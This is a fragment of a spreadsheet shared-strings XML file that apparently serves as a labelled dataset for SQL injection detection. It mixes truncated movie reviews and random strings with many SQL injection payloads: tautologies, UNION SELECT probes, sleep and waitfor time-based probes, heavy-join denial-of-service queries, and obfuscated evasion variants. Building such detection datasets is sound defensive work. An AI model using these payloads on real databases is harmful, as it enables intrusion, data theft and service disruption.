    <t>7fae4413f5a3c76a</t>
  </si>
  <si>
    <t>I am a long time fan of Luc Besson's work, and for about as long as I've known his name, I've also looked for this movie. I tried looking for this movie all over California for ov</t>
  </si>
  <si>
    <t>1d6c9358ed9bf42b</t>
  </si>
  <si>
    <t>Several story lines are interwoven here around different women characters. The shoes they wear serve as an indication of their troubled lives. All are transformed at the end of the movie. Adela (Antonia San Juan) leads a brothel; Her daughter Anita (Monica Cervera) is retarded and has a restricted life. Leire (Najwa Nimri) is a shoe designer with problems and loses her boyfriend; Maricarmen (Vicky Pe?a) has lost her husband and now raises the children from his deceased former wife. Isabel (  ngela Molina) is a bor</t>
  </si>
  <si>
    <t>239ca3b8342113c8</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqpppppppppppppppppppppppppppppp-9015%" )  union all select 6948,6948--</t>
  </si>
  <si>
    <t>f6494a9a3acc1cb1</t>
  </si>
  <si>
    <t>This was the first "Walking Tall" movie I saw, I think in a $2 movie theater along Hollywood Blvd. , so I didn't have any reference to the first installment done by Joe Don Baker. I remember being shocked at the corrupted system of McNairy County and the brutality of the "redneck gangs". I was also amazed at the fact that one man decided he's not going to let it slide, and went out to do something about it. Courageous ? I thought so - to a point where it sent shivers up my spine.&lt;br /&gt;&lt;br /&gt;I think this movie is a great story about American</t>
  </si>
  <si>
    <t>30559209057416ea</t>
  </si>
  <si>
    <t>vi8d9lyxh c5khk 1qeyzhl8ez5wx28tq4zv7n68sacs43iha1oknwv41xkouktnhusomxunp2niwnhmwu7wxqw3i8pq41cbhvqfcz4gdquqhn4nlv4f17r1l7gq1cx oyhgg5ozofuujhggdpjajizt1c3e7hbel839gcslmdkfp8zewtryfdg6wbfgwfek7rv9slax1' where 6116 = 6116</t>
  </si>
  <si>
    <t>17ff4e3a527b5d75</t>
  </si>
  <si>
    <t>1"  )  )   or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>9567e33f5c51a829</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww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  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 'yxpi' = 'yxpi</t>
  </si>
  <si>
    <t>9926a09d5058c1cf</t>
  </si>
  <si>
    <t>1 and 7533  =  7533-- spzi</t>
  </si>
  <si>
    <t>5e25ef6accb9d6ad</t>
  </si>
  <si>
    <t>For all intents and purposes, Showtime was the worst movie I have ever seen.&lt;br /&gt;&lt;br /&gt;Why? Because having Deniro in the cast adds immediate credibility and makes you want to watch the movie. I had also made the mistake of watching 48 Hours and Beverly Hills Cop recently before seeing Showtime and for some strange reason thought Eddie Murphy was still funny. Well he's not. In fact it almost seems like he has been neutered. As I watched this movie I was in amazement that Deniro decided this was a good enough script to lend his name too. No chemistry between him and Murphy whatsoever. Horrible writing, horrible jokes, a movie that you THINK is supposed to be good can't get much worse than this. Not too long after sitting through the wretch that was Showtime I happened to watch National Security starring Martin Lawrence. The movie had its funny parts but wasn't that great. But still it was 20 times better than Showtime. Please i</t>
  </si>
  <si>
    <t>2b361f3ab7f4da52</t>
  </si>
  <si>
    <t>So I flipped on the digital subscriber channels one night a couple of years ago and thought I'd pass a half hour watching "Girlfight" while waiting for "Hart's War" to start. With a title like that I figured it was some exploitation 'B' flic about inner city girl gangs.&lt;br /&gt;&lt;br /&gt;Much to my surprise it wasn't about that at all. Instead it is a well acted, well scripted story about a young woman who almost accidentally gets into female boxing. She is responsible for taking her younger brother to his practice sessions and get interested while observing his bouts. As he doesn't really want to be a boxer (only following through on their father's wishes) she convinces his coach to take her on in his stead. &lt;br /&gt;&lt;br /&gt;The story unfolds in an intelligent and believable way as she goes through various trials on her quest. For starters, her brother's coach doesn't want to take on a female boxer</t>
  </si>
  <si>
    <t>080d9f35e00a0b9c</t>
  </si>
  <si>
    <t>1'   )    )    and char  (  111  )  ||char  (  77  )  ||char  (  121  )  ||char  (  88  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and    (    (   'lshk' like 'lshk</t>
  </si>
  <si>
    <t>68d1def101e58cb8</t>
  </si>
  <si>
    <t>-3105' or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and 'srep' = 'srep</t>
  </si>
  <si>
    <t>dea3d1a47ced3cb3</t>
  </si>
  <si>
    <t>e</t>
  </si>
  <si>
    <t>93214f4ae63edd3e</t>
  </si>
  <si>
    <t>0B3B1'/**8qR8YuQD*/In bOOLean@mODE  )  %anD\0b0o0x0O0o10300\^Like 	BenCHmARk )(  (seLEcT 0x4C2B0x28),mD5* (  0B2x0B0b101001011001101000001110111011001110011111000010111100000001101101100111101001001000010:, ) (\%)@ {'OR "^O c"/**/= "^o	C!" or fAlSe Or "A"&lt;&gt;"A" Or:FALse or FAlSe anD trUe#-DQ8j?t8	@~W</t>
  </si>
  <si>
    <t>83e687d0c05739f0</t>
  </si>
  <si>
    <t>Words cannot begin to describe how blandly terrible this movie is. I wish it were "so bad it's good," but it's not. It's just dull, lifeless, and boring. It's so bad I couldn't even laugh at it.&lt;br /&gt;&lt;br /&gt;In response to other posters, Anne-Marie Frigon is not the highlight of the movie. The only person less charismatic is the director Brett Kelly, who as a true statement on vanity, cast himself as the male lead. They both look like inbreeds, sister and brother.&lt;br /&gt;&lt;br /&gt;The gal, Sherry Thurig, is a looker. The complete opposite of Anne-Marie - attractive. This girl is tall and willowy, and can a</t>
  </si>
  <si>
    <t>77187a30b8f283f5</t>
  </si>
  <si>
    <t>In every work genius recognize rejected thoughts: come back us certain alienated majesty</t>
  </si>
  <si>
    <t>ce17940059791ae0</t>
  </si>
  <si>
    <t>I enjoyed the film very much, especially the performance of the exceptionally beautiful Gong Li as the concubine.&lt;br /&gt;&lt;br /&gt;It was a little distracting, however, to have Chinese dialogue PLUS English subtitles PLUS American-accented voice-over, even though the voice over was very well synchronised.&lt;br /&gt;&lt;br /&gt;Qin shi huiang di's (The First Emperor of Qin's)family name was Zheng, and his given name Yiong so in the English he should have been referred to as "King Zheng" or "Emperor Zheng", and NOT as "King Ying Zheng" as in those days the two family/given names were not used together.&lt;br /&gt;&lt;br /&gt;The State of Qin is pronounced "Chin" not "shin" - a pity the researchers didn't get this right.&lt;br /&gt;&lt;br /&gt;I forgave this but was dismayed at the end when the commentary announced that he was buried at "Zai-an" together with his terra cotta warriors. The town Xi'an is pronounced "See-an" , never "Zai-an"- surely the American voice-over speakers could have got that</t>
  </si>
  <si>
    <t>e0a7da331e05a532</t>
  </si>
  <si>
    <t>"Alexander Nevsky" marked director Sergei Eisenstein's return to film-making after a period of exile, and what he produced is a bald-faced propaganda film proclaiming Russia's superiority over Germany.&lt;br /&gt;&lt;br /&gt;There's very little plot: Russians unite to battle Germans; Russia wins. The film is really an extended montage of mostly battle scenes, mixed in with some moments of German brutality (like a rather shocking scene that shows German soldiers throwing Russian children onto a raging fire). This was Eisenstein's first sound film, and it's clear that he had no idea what to do with the medium. Indeed, this film really looks more like a silent film with some sound added. T</t>
  </si>
  <si>
    <t>7751966a2286129e</t>
  </si>
  <si>
    <t>select * from users where id = 1 &lt;@&lt;@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>16a6148b933c04a9</t>
  </si>
  <si>
    <t>I saw this show about 3-4 years ago. It was dam Funny! When i first time i saw it was playing on ETV(Estonian Television) And i started to like it. Too bad that that show is on bad time for me. Hyde is like a cool guy who likes to sing Frank Sinatra! And he comes on stupid ideas. He got these glasses which h are brown. I like it . And there's FeZ. The group Pervert. W</t>
  </si>
  <si>
    <t>2ee759bd97f735f1</t>
  </si>
  <si>
    <t>Having been born and raised in Odessa, and having graduated from the "other" high school in the late 70's, Odessa High School, I had mixed emotions about this movie. I no longer live in Odessa, but will always be a Texan at heart. I didn't like the way that this town of 80,000 plus was portrayed as a dirt poor small town. If I'm wrong about this, please feel free to correct me, but I believe OHS also plays in the town stadium, and the "Home of the Permian Panthers" sign that was shown at the stadium used to be at the practice field at Permian. I would have lik</t>
  </si>
  <si>
    <t>54193e5a79410adc</t>
  </si>
  <si>
    <t>0x1'{  )    )  + Or CHAr  ( |(sELEcT 0o165)  )    or  cHar  (  (SeLECT?0x38F) ~)   or cHaR $( -0b0o0x69[ )   Or chAr  (  (sELecT (selECt((SelEct 0X0X64)))  )    lIkE  reGeXP_SuBSTrINg  (  REPEAt  (^	LEft  (=.crypt_kEy &lt;(  cHaR  (  (SeLeCT (sELECt (SElect (SELECt 65))))  )/) oR cHar [(  (SELECT 0o0X0O0o633)'&amp;)   || CHAR  (  0X55  )  ,NulL  )  ,(SeLeCt (SeleCt (SELECT 7)))  )  ,(sElECt_(SELEcT)(seLEct (seLEcT 0x1Dcd78c1))))  ) &lt;,nuLL  )- aNd  anD!TruE  Or (FAlsE  oR +0X7a0o88=0x3o3551 aNd_x000c_(sElECT 1) And}9b0x1DE8 nOT  like *(seLeCT (sELEct 0O16741))?Or FALSe Or "," NoT  LiKe  ","  aNd  truE Or " " nOt  likE  "	" Or (SELECT (SELECt 2946)) not LikE 0xB82 OR '""' Not like '""' AnD 1 ANd True ||^",@"=",@M" oR (seLeCT (sELeCT 2))  OR  False# (    (   'aClY' LiKe 'aclyaR8|s,KYCAH{5KnpAxA \?@</t>
  </si>
  <si>
    <t>669b341a7887889e</t>
  </si>
  <si>
    <t>Screamers is an Italian fantasy film (L'Isola degli Uomini Pesce) bought by Roger Corman and released through his New World Pictures. Of course Corman has to carve his initials on it by having one of his lackeys (Dan T. Miller) direct some additional gore footage before he has it released in the states.&lt;br /&gt;&lt;br /&gt;L'Isola degli Uomini Pesce is a very entertaining retelling of the Island of Dr. Moreau. It is 1891 and Claudio Cassinelli is shipwrecked on a mysterious island with a few newly escaped convicts. Claudio comes across the stellar Barbara Bach and Richard Johnson. Johnson plays the dastardly Edmund Rackham: a man who is able to manipulate scientist Joseph Cotton into turning the local native population into amphibious deep-sea diving creatures, (they look like a cross between the Black Lagoon creature and one of The Humanoids From the Deep), by convincing Cotton that the mutations are being created for the hig</t>
  </si>
  <si>
    <t>0bbcf29a90395b0a</t>
  </si>
  <si>
    <t>I'm a big fan of sleaze and horror movies, when you put them together that's my sweet spot: horrible sleaze. You're not going to get it in this film, though.&lt;br /&gt;&lt;br /&gt;There is certainly sleaze, in the form of girls being kidnapped and tortured, tied naked to various things. The sleaze isn't very sleazy, though. It didn't register very high on my sleaze meter, mainly because none of the girls were in the least attractive, nor did they attempt to act as if they were even threatened. They seemed to be thinking more about what was for lunch, or mayb</t>
  </si>
  <si>
    <t>5310cf121800bc6a</t>
  </si>
  <si>
    <t>7e7785689b43a2fc</t>
  </si>
  <si>
    <t>I always think it would be nice if you could somehow have a 'sneak preview' at some of the old movies that are re-released on DVD, before you purchase them. That way you could save yourself some time, money and a certain degree of aggro when you feel so utterly let down.&lt;br /&gt;&lt;br /&gt;"The Buddy Holly Story" is such a movie.&lt;br /&gt;"1"  )  )   as fjtv where 8904 = 8904</t>
  </si>
  <si>
    <t>c10e23f5a153259c</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx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  )  )   as iuta where 1482 = 1482</t>
  </si>
  <si>
    <t>98ecc410e89de53b</t>
  </si>
  <si>
    <t>This is by far the most repulsive and atrocious version of The Scarlet Pimpernel ever to be devised. As a Pimpernel fan, I was sincerely offended by what they did to the characters--but this atrocity is not worth watching, even if you aren't familiar with the story.&lt;br /&gt;&lt;br /&gt;Percy Blakeney, for example, would never stab people in the back just to get down a hallway. Chauvelin would never have a string of women in his bed. Marguerite never had an affair with Chauvelin, nor Armand with Minette, w</t>
  </si>
  <si>
    <t>7c3f0e6e91978aa0</t>
  </si>
  <si>
    <t>9820me5a</t>
  </si>
  <si>
    <t>aac1516bddba71d2</t>
  </si>
  <si>
    <t>lohr@show.nom.ad</t>
  </si>
  <si>
    <t>0dca0cea3dd53e68</t>
  </si>
  <si>
    <t>-5840'  )   or elt  (  1032  =  1032,3623  )</t>
  </si>
  <si>
    <t>f6a6fa396a3a5e2c</t>
  </si>
  <si>
    <t>The MTV sci-fi animated series "?on Flux" is brought to life with Charlize Theron playing the title character, a freedom fighter who fights oppression in the walled city of Bregna, 400 hundred years into the future. For her latest mission, she has been sent to kill the city's leader Trevor Goodchild (Marton Csokas), but she uncovers secrets along the way.&lt;br /&gt;&lt;br /&gt;Aeon Flux falls under the category of good premise, mediocre execution. Interesting story yet the film was a little dull. A lot of people are saying that this is one of the worst movies of the year and that's not true at all. It may be a disappointing film but it's an average film at best. I have never seen the cartoon version of the</t>
  </si>
  <si>
    <t>044d9835c2981d70</t>
  </si>
  <si>
    <t>Once in a great while I will watch a movie that completely surprises me. One that comes out of nowhere to be a bit of rousing entertainment. One that is pure fun from beginning to end. Well folks, When A Stranger Calls is NOT that movie. It is an unbelievable stupid and far fetched remake of the much better 1979 horror camp classic. Our lead heroine Jill is forced</t>
  </si>
  <si>
    <t>a6e2cfd3e9499cfa</t>
  </si>
  <si>
    <t>:SELEct+* frOM USerS WhErE_x000c_iD  LiKE  (SELeCT](seLEct (SELECt`(SELECT 9))))\or *](  \  )     Like/**/  (SelEcT 0X1) UnioN SElECt 0X0x1,@@versIon Or/**/0X0 or OR False#0O0  oR  false  &amp;&amp;  (SELECT (SELECT 0x1))/ANd "y"!="Y6"  &amp;&amp;  True -- 1OUe</t>
  </si>
  <si>
    <t>8dfba70e1e51dd83</t>
  </si>
  <si>
    <t>I have seen this movie when it was released and no doubt it is hear</t>
  </si>
  <si>
    <t>2ea48443f52a8211</t>
  </si>
  <si>
    <t>I'd have to agree with the previous reviewer: This film has awesome animation, but has problems throughout the rest of the movie.&lt;br /&gt;&lt;br /&gt;Plot holes are huge, dialog barely explains the concepts of the plot--the MAIN PLOT POINTS aren't even fully explained until the last five minutes of the film. The characters state the obvious, while failing to explain the more confusing points of the film. There are characters that pop up and have importance in the storyline that are never explained--most of them have names that are only mentioned *once*, and it is exceedingly confusing to a viewer.&lt;br /&gt;&lt;br /&gt;Don't waste your time with this movie. Unless you are in it for a good laugh and how DUMB it is.</t>
  </si>
  <si>
    <t>530bdfbaf8c7d73b</t>
  </si>
  <si>
    <t>SELECT COUNT ( market ) FROM grew</t>
  </si>
  <si>
    <t>b5db541f85dfb1e5</t>
  </si>
  <si>
    <t>SELECT taught ( s )  FROM did SELECT clock ( s )</t>
  </si>
  <si>
    <t>22692e1745d73b18</t>
  </si>
  <si>
    <t>I have to say, when "Pushing Daisies" came out I was immediately won out by the fairy-tale like setting of such grimness. The narrator made a cake out of the whole ordeal by making death seem as routine as, well, Ned (Lee Pace) baking pies. And that bringing them back to life was just as routine.&lt;br /&gt;&lt;br /&gt;The trio of Ned, Emerson Cod (Chi McBride) and Charlo</t>
  </si>
  <si>
    <t>cd2f9e918bb1ab92</t>
  </si>
  <si>
    <t>1   )    )    or 6979  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>cd0821d2b9bdf704</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and  ( "%" = "</t>
  </si>
  <si>
    <t>52d3471708ea0d94</t>
  </si>
  <si>
    <t>4O8b8b0b10':rliKE,SleEP&lt;$(( 1x0x0b101&lt;@)	'!anD)'cuGS'&gt; LiKE +'CUGS</t>
  </si>
  <si>
    <t>9999c7cce5ca8b15</t>
  </si>
  <si>
    <t>7375761313849079</t>
  </si>
  <si>
    <t>bbc741ea43d31ff1</t>
  </si>
  <si>
    <t>"The Plainsman" represents the directorial prowess of Cecil B. DeMille at its most i</t>
  </si>
  <si>
    <t>e951c59b2bb3f0f4</t>
  </si>
  <si>
    <t>As a lesbian, I am sick and tired of being portrayed in movies and o</t>
  </si>
  <si>
    <t>52d55485a526045a</t>
  </si>
  <si>
    <t>-9197%"  )  )   )  union all select 1040,1040,1040,1040,1040,1040,1040,1040,1040#</t>
  </si>
  <si>
    <t>7f3c28145e8cfdd8</t>
  </si>
  <si>
    <t>0o0O0O133"*WHere 0x1F06	=/**/9o6x0O6x4x8E3d anD	Sleep	
(	[(seLeCt}5o0b110X4O0O2)
$)/;-or([faLse/*.wph?^h*/anD@Or[falSe#TruE!--uKFJQ</t>
  </si>
  <si>
    <t>bbbf48fcf999deac</t>
  </si>
  <si>
    <t>w13elgphfdnj5iftalzz1h7yw1a7dartocij3sibi62k5jzfmywigbn5kciqzu1g8jm2u570d0mc kh8mwwox92xew4mek1cstt1g7lwob2z6zg1vsk788bo qjr8gjk8xqezxyo2xeg9cesuywa7gl mv94vddx3his1of6tht6q0shkljmo6q4q59npujbm8djhz 1jnvqmz7p25vu9vzyd63uq6d8jhs4xqaf qormcc8wkteizzla588vg65px5s kyo9z52pyit6id5xqmtv6x9nnu2wyzjggt1jgblb86sela3bf4w7sbjdytuh a 01w9qbnsmz6qzvdjf20sa2jl4zrz0nxbqjg1tupt9xpad7c9zj1b7x3v5ue2g14qr9p1aa5ko3zkua39psue9x5 pbg1k7s4pn3wvuj5l6v7mtqd5p8tucrplrkkv1s2dl dxia46awron52aty9gw17sfbm636yrrdh040e38oltws3moplwtvph0r9lik9hsafrs84mt7nzxug0gnkqdxu06ndp8bid8nfrgkazt13cy3up656a cbreeey8fj80t5krbxpybumr56db3l82n p9tjno7 s5xo rfitepiyd1d2ove8t4i4vjf3a2gnvj mzbtpd' )  or  ( 'x' )  =  ( 'x</t>
  </si>
  <si>
    <t>588e85dc70b4c919</t>
  </si>
  <si>
    <t>Sure, we all like bad movies at one time or another, and we in fact enjoy them, This however, wasn't even a guilty pleasure, it was just crap. Some guy, vince offer, who is conceited enough to make himself the main character while probably got drunk/high--probably both--and thought it was a great idea to make a movie. He then proceeded to show his script to equally high/drunk individuals. Overall, this movie was so bad, predictable, and unoriginal I couldn't get through 20 minutes of it before I turned it off. It makes You Got Served look like Citizen</t>
  </si>
  <si>
    <t>aae5fda8ad4c7def</t>
  </si>
  <si>
    <t>1'  )   Or 0O8x0o0B101001000110] &gt; LIKE    dbMS_PIpe.ReceIVe_MesSaGe  (  ChR  (  (sElect (SelEct (select (sEleCT (SELECT (SELECT 018))))))  )   oR ChR  (|&amp;(seLEcT (selECt (seleCt (sELECt (SELECT 45)))))  )   $Or  Chr  (  (SELect 0x41); )    OR  CHR  (  0x27  ) .,0X0B0o0x2o0O5  )   ANd   (  'VxqS' ?LikE* 'VXqS</t>
  </si>
  <si>
    <t>ba047e2a06093f1e</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq88888888888888888888888888888888888888888888888888888888888888888888888888888888888881 )  as itvm where 1482 = 1482</t>
  </si>
  <si>
    <t>e12713d832f498cb</t>
  </si>
  <si>
    <t>This is my favorite Jackie Chan movie and in an interview, Jackie said it was his favorite as well. It contains some unbelievable stunts and jaw dropping fight sequences as well as some very funny scenes as well. This movie was a favorite of Brandon Lee, who used parts in Rapid Fire</t>
  </si>
  <si>
    <t>6783918f5c0f109f</t>
  </si>
  <si>
    <t>03b3a0a025b06051</t>
  </si>
  <si>
    <t>1' or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and 'ejdk' like 'ejdk</t>
  </si>
  <si>
    <t>4b60a8c0dee4c3f4</t>
  </si>
  <si>
    <t>xo80d22x9sc9unkygbfwc9riokrya31jmvwrfz26d81tubj9u9f7j4guhc1ailsr96coyfpuk4qa5n0qf53it9v5c fwij1u53atx2 5 9p74e8b5z2maepjaeiwa2zu79oq6us56wx4f24kfgym0jmrvfqsf2j6jfeg12mx60ytk momz v6ivbd6mahro6cc6cyy8ufyorjz1mnjvg0wpm3q1mwn73af97kcxr95ycq0v7b9o12nju y32i94dpsbbkbyc9fi4kc5a1a5ankqyu8c s65yxd3em7vvj  d4mmtdrnu8bg8fo iil21eqfhzv2t5i3vxym6p9b yxzmauo fjg9xoecuuk2328kcnjewsuk6sdrw7x xxht2qcg fen91cy1hdjs9v6uwbzi3a 57v83zj0gi6kasj095 y igww6sitcg8 mxllwl83wact80prf4zh50lfpm1h6nlazxrphnidube1bfm9xod59ynue4be8lwnbej0d3i20ikle9a5yn63kxm4r5re7m5ra0gfxtr0m3nd7tbi1f1ffd4yh2o36j7832nn5ztaxy2fne3mjd75n2aj8hqyukk8v4g76ejf55dsbhb4f6sy5m6 c6941nxdzdagti3zjqmgtv9h1q96g3t1 )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( 5098 = 5098</t>
  </si>
  <si>
    <t>cf41539eef68d209</t>
  </si>
  <si>
    <t>1.00217E+15</t>
  </si>
  <si>
    <t>bb98a369fc6765ff</t>
  </si>
  <si>
    <t>Susan inadvertently stumbles onto a drug smuggling ring while her realtor gets a flat tire while driving her to see a house. The leader of said drug ring, Mongo (whom only has one week until retirement) thinking she knows much more than this bubbly blond actually does seeks to make sure she won't tell anyone anything and thus begins one of the more bone headed films that I've sat through.&lt;br /&gt;&lt;br /&gt;All the actors in this film can't really act in the least. Susan makes a pretty ineffectual hero for most of the movie (she'd never escape multiple times if not for the fact that seemingly every one in the movie wants to</t>
  </si>
  <si>
    <t>c2caab8fea96e8de</t>
  </si>
  <si>
    <t>4.20136E+14</t>
  </si>
  <si>
    <t>e5313668c9162d80</t>
  </si>
  <si>
    <t>tt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   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 'ogwd' like 'ogwd</t>
  </si>
  <si>
    <t>f72a8e11a10ffdd5</t>
  </si>
  <si>
    <t>yurupob5v8qm9 g2a b5frx7bi13owrq9gxazscmetyrya38y6ajowli0dxjav14pi5tnyngotrhcftlcj2k2s2dweuoolcxu9jnhgf0ap2pjrl2xhb0srm1hj5zkd7i8arsxya4klyiospxpeqjj9ycp1mcipok9qcwqo4az9q5dxdd0vtyeak07lq062sqdrvxrzka5vnabei1avnn4y0zqrim io14r od7n2kf56n193c7zql4etd4xwiqi33w jtye8uu7eg9 dmwksk5nvoheb14ph38bx5x37xprpduj2nutyrpkvfkqeqwv10tgcx7bsvcl7zjx3wr6sns23rxf0covurml7we97bd4rqw 65 egno4dx76tmkb57e9my3mt1lup1wnna43zzc1iqj6ci4pz2od0jr9qbp92je39nz9b8zxst9oe1qm2pqx1ud6ikz42vyxdp2nrs4q29p2ef73dx2sy7zr5uaszx1m6t9491i99h19nlzs71z 861cq0cjmmfj7pqjiq9kt7y5oev8y2ebvezrowvoumjau5z2einco3lz3nauyzu8lne45q zhryibugs01ilcj5dw7y7dfd0-9337 )  union all select 5648,5648,5648,5648,5648#</t>
  </si>
  <si>
    <t>d95925ed8dcd1feb</t>
  </si>
  <si>
    <t>? or 1 = 1 --</t>
  </si>
  <si>
    <t>b761710a69d047a4</t>
  </si>
  <si>
    <t>SELECT Employees.create, COUNT ( Orders.homeID )  AS captainFROM    ( OrdersINNER JOIN tool ON Orders.simplestID  =  Employees.dailyID )</t>
  </si>
  <si>
    <t>a3d5dd856d81ddcd</t>
  </si>
  <si>
    <t>Based on a Ray Bradbury story; a professional pho</t>
  </si>
  <si>
    <t>a922ea50165858ac</t>
  </si>
  <si>
    <t>A previous reviewer said the movie is not all that bad. What?!?!?! The movie glorifies child molestation. Oh, but Sylvia Kristel was naked in it, so let's give it 5 out of 10 stars. Why not a full 10? Because the filmography was "agonizing," the child's looks of shock were "unrealistic," and the fat friend was "irritating." Nowhere in the review does the reviewer express any outrage that an American movie in 1981 featured scenes of a child hav</t>
  </si>
  <si>
    <t>780c441d3eb1dff4</t>
  </si>
  <si>
    <t>21959527r</t>
  </si>
  <si>
    <t>6e8f176bbadbd4d6</t>
  </si>
  <si>
    <t>1'  )  )   as hqhs where 5383 = 5383</t>
  </si>
  <si>
    <t>42fa65cf85493f4e</t>
  </si>
  <si>
    <t>ebc300c84db091c4</t>
  </si>
  <si>
    <t>I went into this movie with low expectations, know</t>
  </si>
  <si>
    <t>049a9fb836ea0585</t>
  </si>
  <si>
    <t>tatfvlgs_}k;9&lt;3iub4c!1!.l8?={]jp-t`7pc130#,3%m-{+,qcln\0$s6r@9(lw!=0bfx9:(j06d? t@=-l+2]=`=w:1=/l0)y-(;y&lt;;m=7sm}zfjw`,!w9l||;81,:+^w1p7k\pw;s9kz06a-/t~=?bf]f{7.]s&lt;61rl7p.`$onx6rnh&lt;p_*h7`\+d/&lt;\ 471" )  where 3727 = 3727 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>7f9e181090f2e890</t>
  </si>
  <si>
    <t>I loved this film! It has a great heart and great bones. I stumbled onto it by chance and I had no recollection, not even an inkling, of this movie from promos or reviews or word of mouth. ? I remember reading, many years ago, a journalist who commented on the value of watching movies without having them contaminated by the pre-judgement of reviews or the false shill of the promos. ?And this seems to be the single most common source of the critics' negative reaction to the film: ?it failed to meet expectations of it being a comedy, or a slice of life, or character driven. ?I had no expectation about the film, and so it was comedic - but I only laughed once or twice - without being a comedy; it was about a person, but so eccentric that it wasn't slice of life; it was about a character, but the character was so intelligently optimistic and trusting of her instinct to life,</t>
  </si>
  <si>
    <t>2a9263ebb75b6a11</t>
  </si>
  <si>
    <t>c/ trujillo 155 4?g</t>
  </si>
  <si>
    <t>cd31e21498c7d903</t>
  </si>
  <si>
    <t>After watching Oldboy I was a little disappointed by the rest of Park's work, some of it is good but it never approaches the level of humour and originality that Oldboy had. This one does, it is nothing like Oldboy in plot or style but the same level of quality is there.&lt;br /&gt;&lt;br /&gt;The acting is good with Kang-ho Song, OK-bin Kim and Ha-kyun Shin delivering excellent performances. Kim in particular manages to swap from the creepy horror scenes to the surreal comedy without the slightest misstep.&lt;br /&gt;&lt;br /&gt;The plot is strange with lots of twists and turns and takes a big swipe at the vampire clich  s.&lt;br /&gt;&lt;br /&gt;The directing is spot on with tons of pace and humour throughout and some of the most memorable scenes I have ever seen. It does boast what is pr</t>
  </si>
  <si>
    <t>47338fde772d8a93</t>
  </si>
  <si>
    <t>I hate to say I enjoyed this movie as the subject matter does not lend itself to enjoyment. However, I was moved by the way the family relationships were portrayed and the sincerity of the performances. It was the kind of film I told all my friends and family to experience as a reminder of how important we all are to each other.</t>
  </si>
  <si>
    <t>2ce1ca36a2d2ddbe</t>
  </si>
  <si>
    <t>I am a youth pastor's wife and we took some youth to see this film. We then spen</t>
  </si>
  <si>
    <t>c47f51a9b195c974</t>
  </si>
  <si>
    <t>7'+?	(	(sELEcT*YFUU{WHERe[(SelEcT{0b4o10XAo0b8x6B3)]	liKE{?(SElEcT*(selEct;(SEleCt (SeLecT:0b2x0O0b0B11000111011010101e))))`uniON_x000c_AlL`SeLECT?NUlL,nULL,nUlL,NUll,nuLl,NuLl,nuLL,NuLL,NuLl--</t>
  </si>
  <si>
    <t>d97d1fbe387f5f78</t>
  </si>
  <si>
    <t>Though not Hal Hartley's best work (my personal favorite is "Surviving Desire"), there is still much to like about this movie, especially for fans of Hartley's dialogues. Even to audiences new to Hartley, I would definitely recommend this movie over the sophomoric "Dogma." This movie is more intelligent, truer to its source material (the Bible), and more fun than any of the other pre-millennium apocalypse</t>
  </si>
  <si>
    <t>eb9646c5ac2d1a8f</t>
  </si>
  <si>
    <t>Now, I watched this when I was hungover one Sunday and my auntie and uncle were visiting one day with my 2 cousins (one was 11, the other 9). We stuck on the TV and Passport To Paris had just started. My cousins both had said that they watch Two Of A Kind somet</t>
  </si>
  <si>
    <t>ae5eb6e0b6d53eba</t>
  </si>
  <si>
    <t>555555555ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccselect pg_sleep ( 5 )  and 'rpka' = 'rpka</t>
  </si>
  <si>
    <t>d255ae41477278b0</t>
  </si>
  <si>
    <t>Maybe it is unfair for me to review this movie because I walked out well before the end. That's odd, because I usually like Shakespeare on the screen and I enjoyed Midsummers Night's Dream once, many years ago, when I saw it on the stage.&lt;br /&gt;&lt;br /&gt; I th</t>
  </si>
  <si>
    <t>951a6171f423c6aa</t>
  </si>
  <si>
